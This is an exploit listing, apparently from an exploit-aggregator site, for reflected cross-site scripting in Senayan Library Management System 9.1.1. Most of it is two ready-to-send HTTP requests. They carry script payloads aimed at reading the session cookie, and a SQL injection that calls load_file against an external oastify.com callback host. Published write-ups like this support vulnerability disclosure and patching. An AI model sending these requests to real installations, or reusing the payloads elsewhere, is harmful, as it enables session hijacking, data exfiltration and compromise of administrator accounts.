Exploit for Senayan Library Management System 9.1.1 Cross Site Scripting

Name: Exploit for Senayan Library Management System 9.1.1 Cross Site Scripting
Rating: 5 (132 reviews)
2022-12-19 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:170294
## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 XSS-Reflected - PHPSESSID Hijacking + inserting webp image  
## Author: nu11secur1ty  
## Date: 12.17.2022  
## Vendor: https://slims.web.id/web/  
## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.1.1  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1  
  
## Description:  
The value of the `class` request parameter is copied into the HTML  
document as plain text between tags.  
The payload ytrrh<script>alert(1)</script>z3nj2 was submitted in the  
class parameter. This input was echoed unmodified in the application's  
response.  
The attacker can trick some authenticated user to visit his page and  
give to him very sensitive information about the system.  
  
## STATUS: HIGH Vulnerability  
  
[+] Payloads:  
0.0  
  
```GET  
GET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=nu11secur1ty<script>alert(document.cookie)</script>&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27  
HTTP/1.1  
Host: pwnedhost.com  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1  
Connection: close  
  
```  
0.1  
```GET  
GET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%72%61%77%2e%67%69%74%68%75%62%75%73%65%72%63%6f%6e%74%65%6e%74%2e%63%6f%6d%2f%6e%75%31%31%73%65%63%75%72%31%74%79%2f%58%53%53%69%67%68%74%2f%6d%61%73%74%65%72%2f%58%53%53%2d%69%6d%61%67%65%2f%69%6d%61%67%65%2f%6b%6f%73%74%61%61%6b%61%74%69%6c%2e%77%65%62%70%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27  
HTTP/1.1  
Host: pwnedhost.com  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1  
Connection: close  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1)  
  
## Proof and Exploit:  
[href](https://streamable.com/ibdulr)  
  
## Time spent  
`01:30:00`